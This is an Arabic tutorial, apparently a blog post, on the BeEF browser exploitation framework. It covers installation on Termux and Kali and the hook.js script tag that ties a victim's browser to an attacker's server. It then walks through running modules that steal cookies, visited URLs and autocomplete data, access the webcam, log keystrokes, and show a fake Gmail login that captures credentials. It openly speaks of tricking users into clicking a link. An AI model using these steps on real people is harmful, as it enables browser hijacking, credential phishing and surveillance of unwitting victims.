نبذة عن اداة BeEF
وسط مخاوف متزايدة بشأن الهجمات المحمولة عبر الويب ضد العملاء ، بما في ذلك عملاء الأجهزة المحمولة ، يسمح BeEF لمختبري الاختراق المحترف بتقييم الوضع الأمني الفعلي للبيئة المستهدفة باستخدام ناقلات هجوم من جانب العميل. على عكس أطر الأمان الأخرى ، تتخطى BeEF محيط الشبكة ونظام العميل المتصلب ، وتفحص قابلية الاستغلال في سياق الباب المفتوح: متصفح الويب. ستعمل BeEF على ربط واحد أو أكثر من متصفحات الويب واستخدامها كرؤوس جسور لإطلاق وحدات أوامر موجهة والمزيد من الهجمات ضد النظام من داخل سياق المتصفح.
يستخدم الأشخاص المتصفحات لجميع أنواع الأشياء ، وبشكل عام ، نحن نثق في الكثير من المعلومات الشخصية لهم. هذا هو السبب في أن المتصفحات هي سطح هجوم مثالي للمخترق ، لأن الهدف قد لا يعرف حتى أنه مصاب ويغذيك بكل المعلومات التي قد تريدها.
للقيام بذلك ، تحتاج أولاً إلى خداع المستخدم للنقر فوق ارتباط. لإنشاء الرابط ، يمكنك استخدام أداة تسمى BeEF ، والتي كانت مثبتة مسبقًا على Kali Linux
على غرار Metasploit ، يعد BeEF ، الذي يرمز إلى Browser Exploitation Framework ، إطارًا لشن الهجمات. على عكس Metasploit ، فهو خاص بشن هجمات ضد متصفحات الويب. في بعض الحالات ، يمكننا استخدام BeEF جنبًا إلى جنب مع Metasploit لبدء سيناريوهات هجوم أكثر تقدمًا.
تم تطوير الأداة بواسطة مجموعة من المطورين بقيادة Wade Alcorn . تم تصميم BeEF على نظام Ruby on Rails المألوف لاستكشاف نقاط الضعف في المتصفحات واختبارها. على وجه الخصوص ، تعد BeEF منصة ممتازة لاختبار ضعف المتصفح في البرمجة النصية عبر المواقع (XSS) وهجمات الحقن الأخرى.
يمكن لـ BeEF إنشاء رابط يمكنه تتبع الهدف وحتى تشغيل الوحدات النمطية لتصعيد الأذونات وجمع المزيد من المعلومات حول الشخص الذي يقف خلف الكمبيوتر. يمكنه حتى إجراء مسح ضوئي خلف الشبكة التي يستخدمها الشخص ، وهو أمر مثير للإعجاب حيث يمكنك التقاط الصور باستخدام كاميرا الويب الخاصة به ، ومعرفة ما يكتبه ، وإطلاق صفحات التصيد لمحاولة الحصول على بيانات الاعتماد.
التثبيت على Termux
-
تحديث البيانات وتثبيت الحزم
apt update apt install -y git ruby nodejs
تحميل مثبت الاداة
-
التشغيل
cd beef-in-termux ./beef
كيفية الاستخدام
-
أولا تشغيل الاداة باستخدام الامر
beef
أوbeef-xss
[-] You are using the Default credentials [-] (Password must be different from "beef") [-] Please type a new password for the beef user: [*] Please wait for the BeEF service to start. [*] [*] You might need to refresh your browser once it opens. [*] [*] Web UI: http://127.0.0.1:3000/ui/panel [*] Hook: <script src="http://<IP>:3000/hook.js"></script> [*] Example: <script src="http://127.0.0.1:3000/hook.js"></script> ● beef-xss.service - LSB: BeEF Loaded: loaded (/etc/init.d/beef-xss; generated) Active: active (running) since Fri 2020-05-08 12:51:38 EDT; 5s ago Docs: man:systemd-sysv-generator(8) Process: 1432 ExecStart+/etc/init.d/beef-xss start (code=excited, status=0/SUCCESS) Tasks: 10 (limit: 6715) Memory: 140.8M CGroup: /system.slice/beef-xss.service └─1438 ruby /usr/share/beef-xss/beef May 08 12:51:42 kali beef[1]: Starting LSB: BeEF... May 08 12:51:42 kali beef[1]: Started LSB: BeEF. [*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1... -
انسخ الرابط الذي سوف يظهر على الشاشة وألصقه في المتصفح
الرابط مثل
http://127.0.0.1:3000/ui/panel -
سجّل الدخول إلى خدمة BeEF
بمجرد فتح واجهة المتصفح ، ستحتاج إلى تسجيل الدخول إلى خدمة BeEF. بيانات الاعتماد الافتراضية هي لحم بقري لاسم المستخدم ولحم البقر لكلمة المرور. ومع ذلك ، ربما تمت مطالبتك بإنشاء كلمة مرور لجلسة لحوم البقر الخاصة بك (كما هو موضح أعلاه) ، وفي هذه الحالة ، يمكنك استخدام لحم البقر كاسم مستخدم وأي كلمة مرور تختارها.
بعد تسجيل الدخول بنجاح ، يجب أن تشاهد صفحة "البدء" مع معلومات حول كيفية عمل BeEF. على اليسار ، يوجد عمود Hooked Browsers ، حيث ستنتهي جميع المتصفحات التي تتحكم فيها.
-
ربط متصفح الهدف
مفتاح النجاح مع BeEF هو "ربط" المتصفح. هذا يعني أننا نحتاج إلى الهدف لزيارة تطبيق ويب ضعيف باستخدام ملف JavaScript "hook.js". للتدريب ، يوفر BeEF صفحة ويب لمضيفك المحلي مع الحمولة الموجودة فيه ، لذا قم بزيارة ذلك لمعرفة كيفية عمله.
http://127.0.0.1:3000/demos/basic.html
تستجيب الشفرة المحقونة في المتصفح الموصوف للأوامر من خادم BeEF الذي نتحكم فيه. من هناك ، يمكننا القيام بالعديد من الأشياء المؤذية على كمبيوتر الهدف.
-
عرض تفاصيل المتصفح
لدي بعض المتصفحات المتصلة ، لكنني سألقي نظرة على متصفح Chrome. انقر فوق المتصفح الخاص بك ، وسوف ينتقل بك إلى علامة التبويب "التفاصيل" ، والتي توفر معلومات حول المتصفح المعلق. يظهر المنجم مثل Chrome في القيم.
ستظهر لك علامة التبويب هذه أكثر من ذلك بكثير. بالنسبة لي ، أرى أن النظام الأساسي هو Linux x86_64 ؛ أنه يحتوي على مكون Chrome PDF الإضافي وعارض Chrome PDF ومكونات Native Client ؛ تشمل المكونات webgl و webrtc و websocket ؛ وغيرها من المعلومات الشيقة.
-
نفذ الأوامر في المتصفح
الآن بعد أن وصلنا متصفح الهدف ، يمكننا تنفيذ بعض الوحدات المدمجة من علامة التبويب "الأوامر".
هناك أكثر من 300 وحدة نمطية ، من اختراق المتصفح إلى الهندسة الاجتماعية ، بما في ذلك ، على سبيل المثال لا الحصر:
- الحصول على المجالات التي تمت زيارتها (مستعرض)
- الحصول على عناوين URL التي تمت زيارتها (متصفح)
- كاميرا الويب (متصفح)
- احصل على جميع ملفات تعريف الارتباط (امتداد)
- الاستيلاء على جهات اتصال Google (ملحق)
- لقطة شاشة (امتداد)
- سرقة الإكمال التلقائي (الهندسة الاجتماعية)
- التصيد الاحتيالي من Google (الهندسة الاجتماعية)
عندما تجد وحدة نمطية تريد استخدامها ، حددها ، ثم انقر على "تنفيذ" تحت الوصف الخاص بها. على سبيل المثال ، سأستخدم وحدة "Google Phishing" في مجلد "Social Engineering".
بعد تنفيذه ، ستظهر صفحة تسجيل دخول وهمية إلى Gmail في المتصفح المعلق. قد لا يفكر المستخدم مرتين في إدخال اسم المستخدم وكلمة المرور الخاصة به ، وبمجرد قيامه بذلك ، نقوم بتسجيله. بعد ذلك ، يتم توجيههم مرة أخرى إلى موقع Google كما لو كانوا يقومون بتسجيل الدخول بانتظام.
للعثور على اسم المستخدم وكلمة المرور اللذين قمنا بتسجيلهما ، ما عليك سوى النقر فوق الأمر الموجود في عمود " سجل نتائج الوحدة ". بالنسبة لي ، أرى "hfhfhf" باعتباره المستخدم و "sdliasdflihasdflh" ككلمة المرور. يمكنك أيضًا عرض هذه المعلومات من علامة التبويب "السجلات".
إذا أردنا ذلك ، يمكننا تخصيص عنوان URL الذي تستخدمه وحدة التصيد الاحتيالي من Google ، في حالة رغبتك في استخدام شيء أكثر تصديقًا من واجهة Gmail ذات النمط القديم.
بمجرد توصيل المتصفح ، توجد إمكانيات غير محدودة تقريبًا لما يمكننا القيام به. يمكنك حتى الاستفادة من BeEF لهجمات نظام التشغيل. لمزيد من الأمثلة حول ما يمكن أن يساعدك BeEF في تحقيقه ، مثل الوصول إلى كاميرا الويب ومراقبة ضغطات المفاتيح.